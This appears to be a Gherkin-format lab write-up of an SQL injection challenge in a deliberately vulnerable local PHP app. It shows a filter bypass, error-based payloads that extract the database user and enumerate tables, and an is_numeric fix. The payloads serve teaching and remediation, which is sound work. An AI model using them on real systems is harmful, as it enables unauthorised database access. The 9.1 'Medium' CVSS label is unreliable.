## Version 2.0
## language: en

Feature: SQL Injection Level 4
  TOE:
    Vulnerable Web Application
  Category:
    SQL Injection
  Location:
    http://localhost/www/SQL/sql4.php - number (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in
    an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared SQL statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
  TOE information:
    Given The site
    When I enter into it
    Then The server is running 10.1.13-MariaDB

  Scenario: Normal use case
    Given A search bar
    When I enter the book's number "1"
    Then I get the the books's name and the author
    """
    THE HUNGER GAMES -> SUZANNE COLLINS
    """

  Scenario: Static detection
    Given The source code
    When I search for the SQL query inside the code
    """
    $query = "SELECT bookname,authorname FROM books WHERE number = $number";
    """
    Then The number is concatenated inside the query
    And I have the same SQL injection vulnerability as in the other levels
    But I can't use the single quote "'" character because of the validation
    """
    if(strchr($number,"'")){
      echo "What are you trying to do?<br>";
      echo "Awesome hacking skillzz<br>";
      echo "But you can't hack me anymore!";
      exit;
    }
    """

  Scenario: Dynamic detection
    Given The search bar
    When I put a single quote inside the search bar
    Then The page returns an error and the query
    When I read the error
    """
    Book's number :
    Invalid query: Whole query: SELECT bookname,authorname
    FROM books WHERE number = SELECT 1
    """
    Then I see the error
    And I can try an error based SQL Injection

  Scenario: Exploitation
    Given The vulnerability
    When I try to use a simple injection
    """
    ' union select 1,2 #
    """
    Then I get a message from the validation
    """
    What are you trying to do?
    Awesome hacking skillzz
    But you can't hack me anymore!
    """
    When I search another kind of SQLi
    Then I find information about error based SQLi
    """
    https://hydrasky.com/network-security/error-based-sql-injection-attack/
    """
    When I try to inject the query
    """
    (SELECT COUNT(*), CONCAT((SELECT user()),0x3a,FLOOR(RAND(0)*2)) x
    FROM information_schema.tables GROUP BY x)
    """
    Then It doesn't work
    When I decide to create a more elaborated SQLi
    Then I use the first query inside other
    """
    (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()),
    0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x)a)
    """
    And I can enumerate the database

  Scenario: Remediation
    Given The source code
    When I add the next lines of code
    """
    if(!is_numeric($number)){
    echo "Please only numeric values";
    exit(0);
    }
    """
    Then I use the same query
    """
    (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()),
    0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x)a)
    """
    When I submit the form
    Then I get the validation message
    """
    Please only numeric values
    """
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.2/10 (High) - E:H/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2019-09-25
